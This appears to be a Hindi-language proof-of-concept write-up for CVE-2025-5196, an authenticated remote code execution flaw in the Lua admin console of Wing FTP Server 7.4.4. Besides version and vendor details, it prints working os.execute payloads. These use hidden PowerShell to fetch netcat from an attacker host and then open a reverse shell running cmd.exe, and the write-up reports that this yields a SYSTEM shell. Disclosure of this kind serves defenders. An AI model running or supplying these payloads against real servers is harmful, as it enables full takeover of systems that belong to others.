
Wing FTP Server अपने वेब इंटरफ़ेस के माध्यम से सुलभ एक प्रशासनिक Lua स्क्रिप्टिंग कंसोल प्रदान करता है। प्रमाणित प्रशासक अपर्याप्त सैंडबॉक्सिंग के साथ मनमाना Lua कोड निष्पादित करने में सक्षम हैं। CVE-2025-5196
Wing FTP Server अपने वेब इंटरफ़ेस के माध्यम से सुलभ एक प्रशासनिक Lua स्क्रिप्टिंग कंसोल प्रदान करता है। प्रमाणित प्रशासक अपर्याप्त सैंडबॉक्सिंग के साथ मनमाना Lua कोड निष्पादित करने में सक्षम हैं।
प्रभावित संस्करण: Wing FTP Server 7.4.4 (Windows) | प्रमाणीकरण आवश्यक: हाँ
24 मई, 2025 तक, विक्रेता द्वारा प्रदत्त एप्लिकेशन का नवीनतम संस्करण निम्नलिखित लिंक पर पाया जा सकता है: https://www.wftpserver.com/download.htm
इसके अतिरिक्त, यह ध्यान देने योग्य है कि उसी तिथि तक, एक रिलीज़ नोट प्रकाशित किया गया है जिसमें बताया गया है कि RCE भेद्यता संस्करण 7.4.4 में ठीक कर दी गई है। रिलीज़ नोट्स का लिंक यहाँ पाया जा सकता है: https://www.wftpserver.com/serverhistory.htm

CVE-2025-5196 से संबंधित PoC VulDB

Wing FTP Server वेब इंटरफ़ेस


कमांड का पहला भाग nc.exe (Windows x86 के लिए netcat) को पथ "C:\Users\usuario\Desktop\Drops" पर डाउनलोड करेगा। दूसरा भाग nc.exe 192.168.234.131 4443 -e cme.exe निष्पादित करेगा।
os.execute('powershell -NoP -NonI -W Hidden -Exec Bypass -Command "(New-Object Net.WebClient).DownloadFile(\'http://192.168.234.131:8000/nc.exe\', \'C:\\\\Users\\\\usuario\\\\Desktop\\\\Drops\\\\nc.exe\')"')
os.execute('cmd /c powershell -NoP -W Hidden -Command "Start-Process \\"C:\\Users\\usuario\\Desktop\\Drops\\nc.exe\\" -ArgumentList \\"192.168.234.131\\",\\"4443\\",\\"-e\\",\\"cmd.exe\\""')

NT/SYSTEM शेल
